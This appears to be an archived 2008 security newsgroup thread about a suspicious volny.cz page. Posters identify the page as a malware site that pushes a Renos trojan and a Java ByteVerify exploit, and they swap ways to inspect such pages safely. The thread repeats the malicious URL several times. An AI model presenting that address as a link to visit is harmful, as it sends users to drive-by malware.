Velocity Reviews - Computer Hardware Reviews

Velocity Reviews > Newsgroups > Computing > Computer Security > suspicious site

Reply
Thread Tools

suspicious site

 
 
Rick Merrill
Guest
Posts: n/a
 
      01-24-2008
how do you check out something like this?

volny.cz/svhgjtt/dental-plan.html
 
Reply With Quote
 
 
 
 
David H. Lipman
Guest
Posts: n/a
 
      01-24-2008
From: "Rick Merrill" <(E-Mail Removed)>

| how do you check out something like this?
|
| volny.cz/svhgjtt/dental-plan.html

It is a malware related web site that uses VBS/Psyme to download a Renos trojan and a
ByteVerify exploit to install a rogue anti malware utility called Spy-Shredder.


--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


 
Reply With Quote
 
 
 
 
Rick Merrill
Guest
Posts: n/a
 
      01-24-2008
David H. Lipman wrote:
> From: "Rick Merrill" <(E-Mail Removed)>
>
> | how do you check out something like this?
> |
> | volny.cz/svhgjtt/dental-plan.html
>
> It is a malware related web site that uses VBS/Psyme to download a Renos trojan and a
> ByteVerify exploit to install a rogue anti malware utility called Spy-Shredder.
>
>


I didn't know about 'byteverify' but it appears to be a highjacked site,
but 'from whom' it was highjacked i couldn't tell. Is the whole 'cz'
domain not to be trusted?

 
Reply With Quote
 
David H. Lipman
Guest
Posts: n/a
 
      01-24-2008
From: "Rick Merrill" <(E-Mail Removed)>


| I didn't know about 'byteverify' but it appears to be a highjacked site,
| but 'from whom' it was highjacked i couldn't tell. Is the whole 'cz'
| domain not to be trusted?

The ByteVerify is a Java exploit.

Example McAfee log...
5/5/2007 6:58:39 PM Deleted (Clean failed) DLIPMAN-1\lipman
D:\temp\jar_cache30809.tmp\JAR_CACHE30809.TMP Exploit-ByteVerify

It is NOT a hijacked site. It is purposefully malicious.
I can not state that all .CZ (Czech Republic) Domains can not be trusted.

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


 
Reply With Quote
 
Sebastian G.
Guest
Posts: n/a
 
      01-25-2008
David H. Lipman wrote:


> D:\temp\jar_cache30809.tmp\JAR_CACHE30809.TMP Exploit-ByteVerify
>
> It is NOT a hijacked site. It is purposefully malicious.
> I can not state that all .CZ (Czech Republic) Domains can not be trusted.


But what we can tell for sure is that the owner is horribly stupid. The Byte
Verifier vulnerability was, well, Java JDK 1.1? Even the similiar-to-Java-
but-not-actually-Java-VM that Microsoft shipped with Windows 2000 and XP was
already at JDK 1.2 level, not vulnerable to this thing.

I still wonder how this thing is still in usage, even though the most stupid
bad guy would recognize an infection rate of essentially zero.
 
Reply With Quote
 
David H. Lipman
Guest
Posts: n/a
 
      01-25-2008
From: "Sebastian G." <(E-Mail Removed)>


|
| But what we can tell for sure is that the owner is horribly stupid. The Byte
| Verifier vulnerability was, well, Java JDK 1.1? Even the similiar-to-Java-
| but-not-actually-Java-VM that Microsoft shipped with Windows 2000 and XP was
| already at JDK 1.2 level, not vulnerable to this thing.
|
| I still wonder how this thing is still in usage, even though the most stupid
| bad guy would recognize an infection rate of essentially zero.

Exploit-ByteVerify is rather generic. Many newer versions of Sun Java were also vulnerable.
There have been many variants to ByteVerify and they seem to increase.

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


 
Reply With Quote
 
Sebastian G.
Guest
Posts: n/a
 
      01-25-2008
David H. Lipman wrote:


> | But what we can tell for sure is that the owner is horribly stupid. The Byte
> | Verifier vulnerability was, well, Java JDK 1.1? Even the similiar-to-Java-
> | but-not-actually-Java-VM that Microsoft shipped with Windows 2000 and XP was
> | already at JDK 1.2 level, not vulnerable to this thing.
> |
> | I still wonder how this thing is still in usage, even though the most stupid
> | bad guy would recognize an infection rate of essentially zero.
>
> Exploit-ByteVerify is rather generic. Many newer versions of Sun Java were also vulnerable.



Hm? I've followed through the release notes of every version of Sun's Java
VM since JDK 1.2 and I'm very sure that they never mentioned any security
vulnerability in the bytecode verifier. Not even after they changed the
class format for helping implement the much simpler and more secure
SSA-based verifier.

> There have been many variants to ByteVerify and they seem to increase.


According to my analysis, it's the same old disfunctional crap from '98.
 
Reply With Quote
 
blackhat
Guest
Posts: n/a
 
      01-26-2008
On Jan 23, 7:20*pm, Rick Merrill <(E-Mail Removed)>
wrote:
> how do you check out something like this?
>
> volny.cz/svhgjtt/dental-plan.html


You don't, just stay away from it
 
Reply With Quote
 
Casper
Guest
Posts: n/a
 
      02-01-2008
Rick Merrill brought next idea :
> how do you check out something like this?
>
> volny.cz/svhgjtt/dental-plan.html


I use a text browser like Lynx to go to suspicious sites
(there is also a lynx for windows)


 
Reply With Quote
 
Todd H.
Guest
Posts: n/a
 
      02-01-2008
Rick Merrill <(E-Mail Removed)> writes:

> how do you check out something like this?
>
> volny.cz/svhgjtt/dental-plan.html


Curl would pull the html down and dump it in a text file -- handy
commandline tool.

--
Todd H.
http://www.toddh.net/
 
Reply With Quote
 
 
 
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
suspicious application in task manager? John Black Computer Security 3 07-01-2005 11:06 AM
Suspicious Firefox 1.0 PR Communications boris Firefox 16 10-18-2004 02:14 PM
? Need help interpreting this suspicious HTML code Alec S. HTML 5 09-11-2004 02:32 AM
suspicious (?) e-mail from iPowerWeb Billing Team wgreene Computer Support 5 07-31-2004 12:44 AM
Suspicious script Joe Computer Support 2 09-10-2003 04:00 PM



Advertisments